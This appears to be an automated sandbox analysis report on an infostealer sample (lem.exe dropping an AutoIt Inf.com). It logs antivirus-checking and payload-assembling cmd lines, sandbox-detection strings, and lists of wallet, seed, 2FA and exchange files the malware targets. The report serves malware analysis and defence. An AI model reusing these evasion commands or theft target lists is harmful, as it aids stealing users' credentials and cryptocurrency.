                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: Google Drive.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: YouTube.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Sheets.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Gmail.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Slides.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Docs.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: lem.exeStatic file information: File size 1273852 > 1048576
                Source: lem.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cryptosetup.pdbGCTL source: Inf.com, 0000000D.00000002.3274650017.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, 68QI5X.13.dr
                Source: Binary string: cryptosetup.pdb source: Inf.com, 0000000D.00000002.3274650017.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, 68QI5X.13.dr
                Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: lem.exeStatic PE information: real checksum: 0x13b848 should be: 0x144e84
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A30DE6 push ecx; ret 13_2_00A30DF9

                Persistence and Installation Behavior

                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile created: C:\ProgramData\9HDT0HDBIMOZ\68QI5XJump to dropped file

                Boot Survival

                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00AA26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,13_2_00AA26DD
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A2FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,13_2_00A2FC7C
                Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_13-105262
                Source: Inf.com, 0000000D.00000002.3276645001.0000000004460000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                Source: Inf.com, 0000000D.00000002.3276645001.0000000004460000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: DIR_WATCH.DLLAP
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comDropped PE file which has not been started: C:\ProgramData\9HDT0HDBIMOZ\68QI5XJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comAPI coverage: 3.7 %
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A7DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_00A7DC54
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A8A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00A8A087
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A8A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00A8A1E2
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A7E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,13_2_00A7E472
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A8A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,13_2_00A8A570
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A866DC FindFirstFileW,FindNextFileW,FindClose,13_2_00A866DC
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A4C622 FindFirstFileExW,13_2_00A4C622
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A873D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,13_2_00A873D4
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A87333 FindFirstFileW,FindClose,13_2_00A87333
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A7D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_00A7D921
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A15FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,13_2_00A15FC8
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
                Source: chrome.exe, 00000011.00000002.2693095928.000051D800080000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                Source: D2DTJM.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: chrome.exe, 00000011.00000002.2683469881.00000161C7865000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: D2DTJM.13.drBinary or memory string: discord.comVMware20,11696428655f
                Source: D2DTJM.13.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: D2DTJM.13.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: D2DTJM.13.drBinary or memory string: global block list test formVMware20,11696428655
                Source: D2DTJM.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: Inf.com, 0000000D.00000002.3274095484.00000000014E6000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000000D.00000002.3277051984.00000000044FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: msedge.exe, 00000015.00000003.2749568805.000054E00039C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
                Source: D2DTJM.13.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: D2DTJM.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: D2DTJM.13.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: D2DTJM.13.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: D2DTJM.13.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: D2DTJM.13.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: D2DTJM.13.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: D2DTJM.13.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: D2DTJM.13.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: chrome.exe, 00000011.00000002.2682443030.00000161C3CA8000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2760397293.000002708D643000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.2927420587.0000022CE5642000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: D2DTJM.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: D2DTJM.13.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: D2DTJM.13.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: D2DTJM.13.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: chrome.exe, 00000011.00000002.2683469881.00000161C7865000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_
                Source: D2DTJM.13.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: D2DTJM.13.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: chrome.exe, 00000011.00000002.2695703721.000051D8007D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=adebf139-8470-4e39-9765-e2a30b13ddca
                Source: D2DTJM.13.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: D2DTJM.13.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: D2DTJM.13.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: chrome.exe, 00000011.00000002.2699271875.000051D801198000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Virtual USB Mouse)
                Source: D2DTJM.13.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: D2DTJM.13.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: D2DTJM.13.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: D2DTJM.13.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: D2DTJM.13.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: D2DTJM.13.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: Inf.com, 0000000D.00000002.3277051984.00000000044FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWC&
                Source: D2DTJM.13.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comProcess information queried: ProcessInformation
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A8F4FF BlockInput,13_2_00A8F4FF
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A1338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,13_2_00A1338B
                Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A35058 mov eax, dword ptr fs:[00000030h]13_2_00A35058
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A720AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,13_2_00A720AA
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A42992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00A42992
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A30BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00A30BAF
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A30D45 SetUnhandledExceptionFilter,13_2_00A30D45
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A30F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00A30F91

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara matchFile source: Process Memory Space: Inf.com PID: 1276, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A71B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,13_2_00A71B4D
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A1338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,13_2_00A1338B
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A7BBED SendInput,keybd_event,13_2_00A7BBED
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A7EC9E mouse_event,13_2_00A7EC9E
                Source: C:\Users\user\Desktop\lem.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cohen Cohen.cmd & Cohen.cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 105235
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Authorization
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "aid" Division
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 105235\Inf.com + Proceedings + Recovery + Webster + Sunglasses + Cultural + Tulsa + Being + Name + Silicon + Subtle 105235\Inf.com
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Glad + ..\Norway + ..\Tired m
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Inf.com m
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A714AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,13_2_00A714AE
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A71FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,13_2_00A71FB0
                Source: Inf.com, 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp, Inf.com.2.dr, Name.9.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Inf.comBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A30A08 cpuid 13_2_00A30A08
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A6E5F4 GetLocalTime,13_2_00A6E5F4
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A6E652 GetUserNameW,13_2_00A6E652
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A4BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,13_2_00A4BCD2
                Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831

                Stealing of Sensitive Information

                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 13.2.Inf.com.f0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000003.2418518687.0000000001529000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000003.2418360409.0000000004761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3268617637.00000000000F1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000003.2418604420.00000000044E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000003.2418255884.0000000004469000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3274095484.00000000014E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000003.2418297625.0000000001505000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000003.2418561056.00000000015AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3276645001.0000000004460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Inf.com PID: 1276, type: MEMORYSTR
                Source: Inf.com, 0000000D.00000002.3268617637.00000000001CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*
                Source: Inf.com, 0000000D.00000002.3268617637.000000000029C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
